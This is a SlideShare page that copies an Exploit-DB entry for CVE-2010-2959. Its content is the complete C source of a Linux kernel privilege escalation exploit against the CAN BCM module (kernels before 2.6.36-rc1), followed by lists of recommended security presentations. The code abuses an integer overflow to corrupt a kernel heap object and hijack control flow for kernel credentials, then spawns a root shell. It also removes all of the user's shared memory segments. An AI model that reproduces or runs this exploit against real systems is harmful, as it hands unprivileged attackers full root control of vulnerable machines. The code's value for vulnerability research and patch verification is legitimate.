SlideShare una empresa de Scribd logo

Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit

Carlos Eduardo
Carlos Eduardo
TecnologíaDeportes
1 de 8
Descargar para leer sin conexión
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit EDB-ID: 14814 CVE: 2010-2959 OSVDB-ID: N/A Rating Overall: Author: Jon Oberheide Published: 2010-08-27 Verified: 1 2 Exploit Code: Vulnerable App: N/A 3 4 5 (5.0) view source print? /* * i-CAN-haz-MODHARDEN.c * * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 * * Ben Hawkes discovered an integer overflow in the Controller Area Network * (CAN) subsystem when setting up frame content and filtering certain * messages. An attacker could send specially crafted CAN traffic to crash * the system or gain root privileges. * * Usage: * * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden * $ ./i-can-haz-modharden * ... * [+] launching root shell! * # id * uid=0(root) gid=0(root) * * Notes: * * The allocation pattern of the CAN BCM module gives us some desirable * properties for smashing the SLUB. We control the kmalloc with a 16-byte * granularity allowing us to place our allocation in the SLUB cache of our * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for * old-times sake). The allocation can also be made in its own discrete * stage before the overwrite which allows us to be a bit more conservative * in ensuring the proper layout of our SLUB cache. * * To exploit the vulnerability, we first create a BCM RX op with a crafted * nframes to trigger the integer overflow during the kmalloc. On the second * call to update the existing RX op, we bypass the E2BIG check since the * stored nframes in the op is large, yet has an insufficiently sized * allocation associated with it. We then have a controlled write into the * adjacent shmid_kernel object in the 96-byte SLUB cache. * * However, while we control the length of the SLUB overwrite via a * memcpy_fromiovec operation, there exists a memset operation that directly * follows which zeros out last_frames, likely an adjacent allocation, with * the same malformed length, effectively nullifying our shmid smash. To * work around this, we take advantage of the fact that copy_from_user can * perform partial writes on x86 and trigger an EFAULT by setting up a * truncated memory mapping as the source for the memcpy_fromiovec operation, * allowing us to smash the necessary amount of memory and then pop out and * return early before the memset operation occurs. * * We then perform a dry-run and detect the shmid smash via an EIDRM errno * from shmat() caused by an invalid ipc_perm sequence number. Once we're * sure we have a shmid_kernel under our control we re-smash it with the * malformed version and redirect control flow to our credential modifying * calls mapped in user space. * * Distros: please use grsecurity's MODHARDEN or SELinux's module_request * to restrict unprivileged loading of uncommon packet families. Allowing 1 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ * the loading of poorly-written PF modules just adds a non-trivial and * unnecessary attack surface to the kernel. * * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports * easily to other vulnerable kernels/distros. Careful, it could use some * post-exploitation stability love as well. * * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that * this exploit borrows code from. */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <inttypes.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/mman.h> #include <sys/stat.h> #define SLUB "kmalloc-96" #define ALLOCATION 96 #define FILLER 100 #ifndef PF_CAN #define PF_CAN 29 #endif #ifndef CAN_BCM #define CAN_BCM 2 #endif struct sockaddr_can { sa_family_t can_family; int can_ifindex; union { struct { uint32_t rx_id, tx_id; } tp; } can_addr; }; struct can_frame { uint32_t can_id; uint8_t can_dlc; uint8_t data[8] __attribute__((aligned(8))); }; struct bcm_msg_head { uint32_t opcode; uint32_t flags; uint32_t count; struct timeval ival1, ival2; uint32_t can_id; uint32_t nframes; struct can_frame frames[0]; }; #define RX_SETUP 5 #define RX_DELETE 6 #define CFSIZ sizeof(struct can_frame) #define MHSIZ sizeof(struct bcm_msg_head) #define IPCMNI 32768 #define EIDRM 43 #define HDRLEN_KMALLOC 8 struct list_head { struct list_head *next; struct list_head *prev; }; struct super_block { struct list_head s_list; unsigned int s_dev; unsigned long s_blocksize; unsigned char s_blocksize_bits; unsigned char s_dirt; uint64_t s_maxbytes; void *s_type; void *s_op; 2 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ void *dq_op; void *s_qcop; void *s_export_op; unsigned long s_flags; } super_block; struct mutex { unsigned int count; unsigned int wait_lock; struct list_head wait_list; void *owner; }; struct inode { struct list_head i_hash; struct list_head i_list; struct list_head i_sb_list; struct list_head i_dentry_list; unsigned long i_ino; unsigned int i_count; unsigned int i_nlink; unsigned int i_uid; unsigned int i_gid; unsigned int i_rdev; uint64_t i_version; uint64_t i_size; unsigned int i_size_seqcount; long i_atime_tv_sec; long i_atime_tv_nsec; long i_mtime_tv_sec; long i_mtime_tv_nsec; long i_ctime_tv_sec; long i_ctime_tv_nsec; uint64_t i_blocks; unsigned int i_blkbits; unsigned short i_bytes; unsigned short i_mode; unsigned int i_lock; struct mutex i_mutex; unsigned int i_alloc_sem_activity; unsigned int i_alloc_sem_wait_lock; struct list_head i_alloc_sem_wait_list; void *i_op; void *i_fop; struct super_block *i_sb; void *i_flock; void *i_mapping; char i_data[84]; void *i_dquot_1; void *i_dquot_2; struct list_head i_devices; void *i_pipe_union; unsigned int i_generation; unsigned int i_fsnotify_mask; void *i_fsnotify_mark_entries; struct list_head inotify_watches; struct mutex inotify_mutex; } inode; struct dentry { unsigned int d_count; unsigned int d_flags; unsigned int d_lock; int d_mounted; void *d_inode; struct list_head d_hash; void *d_parent; } dentry; struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; 3 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ void *poll; void *ioctl; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; } op; struct vfsmount { struct list_head mnt_hash; void *mnt_parent; void *mnt_mountpoint; void *mnt_root; void *mnt_sb; struct list_head mnt_mounts; struct list_head mnt_child; int mnt_flags; const char *mnt_devname; struct list_head mnt_list; struct list_head mnt_expire; struct list_head mnt_share; struct list_head mnt_slave_list; struct list_head mnt_slave; struct vfsmount *mnt_master; struct mnt_namespace *mnt_ns; int mnt_id; int mnt_group_id; int mnt_count; } vfsmount; struct file { struct list_head fu_list; struct vfsmount *f_vfsmnt; struct dentry *f_dentry; void *f_op; unsigned int f_lock; unsigned long f_count; } file; struct kern_ipc_perm { unsigned int lock; int deleted; int id; unsigned int key; unsigned int uid; unsigned int gid; unsigned int cuid; unsigned int cgid; unsigned int mode; unsigned int seq; void *security; }; struct shmid_kernel { struct kern_ipc_perm shm_perm; struct file *shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; unsigned int shm_cprid; unsigned int shm_lprid; void *mlock_user; 4 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ } shmid_kernel; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) kernel_code(struct file *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %sn", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %sn", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '0'; } } } if (ret == 0) { fscanf(f, "%sn", sname); continue; } if (!strcmp(name, sname)) { printf("[+] resolved symbol %s to %pn", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int check_slabinfo(char *cache, int *active_out, int *total_out) { FILE *fp; char name[64], slab[256]; int active, total, diff; memset(slab, 0, sizeof(slab)); memset(name, 0, sizeof(name)); fp = fopen("/proc/slabinfo", "r"); if (!fp) { printf("[-] sorry, /proc/slabinfo is not available!"); exit(1); } fgets(slab, sizeof(slab) - 1, fp); while (1) { 5 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ fgets(slab, sizeof(slab) - 1, fp); sscanf(slab, "%s %u %u", name, &active, &total); diff = total - active; if (strcmp(name, cache) == 0) { break; } } fclose(fp); if (active_out) { *active_out = active; } if (total_out) { *total_out = total; } return diff; } void trigger(void) { int *shmids; int i, ret, sock, cnt, base, smashed; int diff, active, total, active_new, total_new; int len, sock_len, mmap_len; struct sockaddr_can addr; struct bcm_msg_head *msg; void *efault; char *buf; printf("[+] creating PF_CAN socket...n"); sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); if (sock < 0) { printf("[-] kernel lacks CAN packet family supportn"); exit(1); } printf("[+] connecting PF_CAN socket...n"); memset(&addr, 0, sizeof(addr)); addr.can_family = PF_CAN; ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr)); if (sock < 0) { printf("[-] could not connect CAN socketn"); exit(1); } len = MHSIZ + (CFSIZ * (ALLOCATION / 16)); msg = malloc(len); memset(msg, 0, len); msg->can_id = 2959; msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1; printf("[+] clearing out any active OPs via RX_DELETE...n"); msg->opcode = RX_DELETE; ret = send(sock, msg, len, 0); printf("[+] removing any active user-owned shmids...n"); system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;"); printf("[+] massaging " SLUB " SLUB cache with dummy allocationsn"); diff = check_slabinfo(SLUB, &active, &total); shmids = malloc(sizeof(int) * diff * 10); cnt = diff * 10; for (i = 0; i < cnt; ++i) { diff = check_slabinfo(SLUB, &active, &total); if (diff == 0) { break; } shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } base = i; if (diff != 0) { printf("[-] inconsistency detected with SLUB cache allocation, please try againn"); exit(1); } printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...n"); i = base; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } msg->opcode = RX_SETUP; ret = send(sock, msg, len, 0); 6 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ if (ret < 0) { printf("[-] kernel rejected malformed CAN headern"); exit(1); } i = base + FILLER; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...n"); mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3); sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4); efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("[+] mmap'ed mapping of length %d at %pn", mmap_len, efault); printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...n"); msg = (struct bcm_msg_head *) efault; memset(msg, 0, mmap_len); msg->can_id = 2959; msg->nframes = (ALLOCATION / 16) * 4; msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!n"); exit(1); } printf("[+] seeking out the smashed shmid_kernel...n"); i = base; cnt = i + FILLER + FILLER; for (; i < cnt; ++i) { ret = (int) shmat(shmids[i], NULL, SHM_RDONLY); if (ret == -1 && errno == EIDRM) { smashed = i; break; } } if (i == cnt) { printf("[-] could not find smashed shmid, trying running the exploit again!n"); exit(1); } printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %dn", i, shmids[i]); printf("[+] re-smashing the shmid_kernel with exploit payload...n"); shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI; buf = (char *) msg; memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!n"); exit(1); } ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY); if (ret == -1 && errno != EIDRM) { setresuid(0, 0, 0); setresgid(0, 0, 0); printf("[+] launching root shell!n"); execl("/bin/bash", "/bin/bash", NULL); exit(0); } printf("[-] exploit failed! retry?n"); } void setup(void) { printf("[+] looking for symbols...n"); commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("[-] symbol table not availabe, aborting!n"); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("[-] symbol table not availabe, aborting!n"); } printf("[+] setting up exploit payload...n"); super_block.s_flags = 0; inode.i_size = 4096; 7 de 8 17/2/2012 14:55
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ inode.i_sb = &super_block; inode.inotify_watches.next = &inode.inotify_watches; inode.inotify_watches.prev = &inode.inotify_watches; inode.inotify_mutex.count = 1; dentry.d_count = 4096; dentry.d_flags = 4096; dentry.d_parent = NULL; dentry.d_inode = &inode; op.mmap = &kernel_code; op.get_unmapped_area = &kernel_code; vfsmount.mnt_flags = 0; vfsmount.mnt_count = 1; file.fu_list.prev = &file.fu_list; file.fu_list.next = &file.fu_list; file.f_dentry = &dentry; file.f_vfsmnt = &vfsmount; file.f_op = &op; shmid_kernel.shm_perm.key = IPC_PRIVATE; shmid_kernel.shm_perm.uid = getuid(); shmid_kernel.shm_perm.gid = getgid(); shmid_kernel.shm_perm.cuid = getuid(); shmid_kernel.shm_perm.cgid = getgid(); shmid_kernel.shm_perm.mode = -1; shmid_kernel.shm_file = &file; } int main(int argc, char **argv) { setup(); trigger(); return 0; } Comments No comments so far © Offensive Security 2011 8 de 8 17/2/2012 14:55

Recomendados

Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerAjit Dadresa
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Extend Your Market Reach with IBM Security QRadar for MSPs
Extend Your Market Reach with IBM Security QRadar for MSPsExtend Your Market Reach with IBM Security QRadar for MSPs
Extend Your Market Reach with IBM Security QRadar for MSPsIBM Security
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
The difference between Cybersecurity and Information Security
The difference between Cybersecurity and Information SecurityThe difference between Cybersecurity and Information Security
The difference between Cybersecurity and Information SecurityPECB
 
Open Source & Cybersecurity
Open Source & CybersecurityOpen Source & Cybersecurity
Open Source & CybersecurityFathi Kamil Mohad Zainuddin
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsYulian Slobodyan
 

Recomendados

Demo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scannerAjit Dadresa
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Extend Your Market Reach with IBM Security QRadar for MSPs
Extend Your Market Reach with IBM Security QRadar for MSPsExtend Your Market Reach with IBM Security QRadar for MSPs
Extend Your Market Reach with IBM Security QRadar for MSPsIBM Security
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageLeveraging MITRE ATT&CK - Speaking the Common Language
Leveraging MITRE ATT&CK - Speaking the Common LanguageErik Van Buggenhout
 
The difference between Cybersecurity and Information Security
The difference between Cybersecurity and Information SecurityThe difference between Cybersecurity and Information Security
The difference between Cybersecurity and Information SecurityPECB
 
Open Source & Cybersecurity
Open Source & CybersecurityOpen Source & Cybersecurity
Open Source & CybersecurityFathi Kamil Mohad Zainuddin
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsYulian Slobodyan
 
A Guide to Managed Security Services
A Guide to Managed Security ServicesA Guide to Managed Security Services
A Guide to Managed Security ServicesGraham Mann
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF n|u - The Open Security Community
 
Security awareness training - 4 topics that matter most
Security awareness training - 4 topics that matter mostSecurity awareness training - 4 topics that matter most
Security awareness training - 4 topics that matter mostInfosec
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Nessus Basics
Nessus BasicsNessus Basics
Nessus Basicsamiable_indian
 
McAfee SIEM solution
McAfee SIEM solution McAfee SIEM solution
McAfee SIEM solution hashnees
 
Security architecture - Perform a gap analysis
Security architecture - Perform a gap analysisSecurity architecture - Perform a gap analysis
Security architecture - Perform a gap analysisCarlo Dapino
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | EdurekaTop 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | EdurekaEdureka!
 
Cyber security threats and its solutions
Cyber security threats and its solutionsCyber security threats and its solutions
Cyber security threats and its solutionsmaryrowling
 
Red team Engagement
Red team EngagementRed team Engagement
Red team EngagementIndranil Banerjee
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutDevSecCon
 
Cyber threat intelligence ppt
Cyber threat intelligence pptCyber threat intelligence ppt
Cyber threat intelligence pptKumar Gaurav
 
Basic of SSDLC
Basic of SSDLCBasic of SSDLC
Basic of SSDLCChitpong Wuttanan
 
Blue Team
Blue TeamBlue Team
Blue TeamNull Bhubaneswar
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
Network Security Tools and applications
Network Security Tools and applicationsNetwork Security Tools and applications
Network Security Tools and applicationswebhostingguy
 
Roadmap to security operations excellence
Roadmap to security operations excellenceRoadmap to security operations excellence
Roadmap to security operations excellenceErik Taavila
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 
Linux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - WonokaerunLinux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - Wonokaerunidsecconf
 
Linux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an exampleLinux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an exampleClay (Chih-Hao) Chang
 

Más contenido relacionado

La actualidad más candente

A Guide to Managed Security Services
A Guide to Managed Security ServicesA Guide to Managed Security Services
A Guide to Managed Security ServicesGraham Mann
 
Security awareness training - 4 topics that matter most
Security awareness training - 4 topics that matter mostSecurity awareness training - 4 topics that matter most
Security awareness training - 4 topics that matter mostInfosec
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
McAfee SIEM solution
McAfee SIEM solution McAfee SIEM solution
McAfee SIEM solution hashnees
 
Security architecture - Perform a gap analysis
Security architecture - Perform a gap analysisSecurity architecture - Perform a gap analysis
Security architecture - Perform a gap analysisCarlo Dapino
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | EdurekaTop 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | EdurekaEdureka!
 
Cyber security threats and its solutions
Cyber security threats and its solutionsCyber security threats and its solutions
Cyber security threats and its solutionsmaryrowling
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutDevSecCon
 
Cyber threat intelligence ppt
Cyber threat intelligence pptCyber threat intelligence ppt
Cyber threat intelligence pptKumar Gaurav
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N NessusUtkarsh Verma
 
Network Security Tools and applications
Network Security Tools and applicationsNetwork Security Tools and applications
Network Security Tools and applicationswebhostingguy
 
Roadmap to security operations excellence
Roadmap to security operations excellenceRoadmap to security operations excellence
Roadmap to security operations excellenceErik Taavila
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceDhruv Majumdar
 

La actualidad más candente (20)

A Guide to Managed Security Services
A Guide to Managed Security ServicesA Guide to Managed Security Services
A Guide to Managed Security Services
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF
 
Security awareness training - 4 topics that matter most
Security awareness training - 4 topics that matter mostSecurity awareness training - 4 topics that matter most
Security awareness training - 4 topics that matter most
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Nessus Basics
Nessus BasicsNessus Basics
Nessus Basics
 
McAfee SIEM solution
McAfee SIEM solution McAfee SIEM solution
McAfee SIEM solution
 
Security architecture - Perform a gap analysis
Security architecture - Perform a gap analysisSecurity architecture - Perform a gap analysis
Security architecture - Perform a gap analysis
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | EdurekaTop 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
Top 10 Reasons to Learn Cybersecurity | Why Cybersecurity is Important | Edureka
 
Cyber security threats and its solutions
Cyber security threats and its solutionsCyber security threats and its solutions
Cyber security threats and its solutions
 
Red team Engagement
Red team EngagementRed team Engagement
Red team Engagement
 
Threat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert HurlbutThreat Modeling workshop by Robert Hurlbut
Threat Modeling workshop by Robert Hurlbut
 
Cyber threat intelligence ppt
Cyber threat intelligence pptCyber threat intelligence ppt
Cyber threat intelligence ppt
 
Basic of SSDLC
Basic of SSDLCBasic of SSDLC
Basic of SSDLC
 
Blue Team
Blue TeamBlue Team
Blue Team
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Network Security Nmap N Nessus
Network Security Nmap N NessusNetwork Security Nmap N Nessus
Network Security Nmap N Nessus
 
Network Security Tools and applications
Network Security Tools and applicationsNetwork Security Tools and applications
Network Security Tools and applications
 
Roadmap to security operations excellence
Roadmap to security operations excellenceRoadmap to security operations excellence
Roadmap to security operations excellence
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 

Similar a Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit

Linux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - WonokaerunLinux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - Wonokaerunidsecconf
 
Linux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an exampleLinux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an exampleClay (Chih-Hao) Chang
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAlex Matrosov
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressLinaro
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource KernelsSilvio Cesare
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
Summary of linux kernel security protections
Summary of linux kernel security protectionsSummary of linux kernel security protections
Summary of linux kernel security protectionsShubham Dubey
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debuggingHao-Ran Liu
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersAlexandre Moneger
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Mauricio Velazco
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Jian-Hong Pan
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted CoreDi Shen
 
ARM® Cortex™ M Bootup_CMSIS_Part_2_3
ARM® Cortex™ M Bootup_CMSIS_Part_2_3ARM® Cortex™ M Bootup_CMSIS_Part_2_3
ARM® Cortex™ M Bootup_CMSIS_Part_2_3Raahul Raghavan
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityAndrew Case
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on LabMichelle Holley
 

Similar a Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit (20)

Linux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - WonokaerunLinux kernel-rootkit-dev - Wonokaerun
Linux kernel-rootkit-dev - Wonokaerun
 
Linux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an exampleLinux Integrity Mechanisms - Protecting Container Runtime as an example
Linux Integrity Mechanisms - Protecting Container Runtime as an example
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/Gapz
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
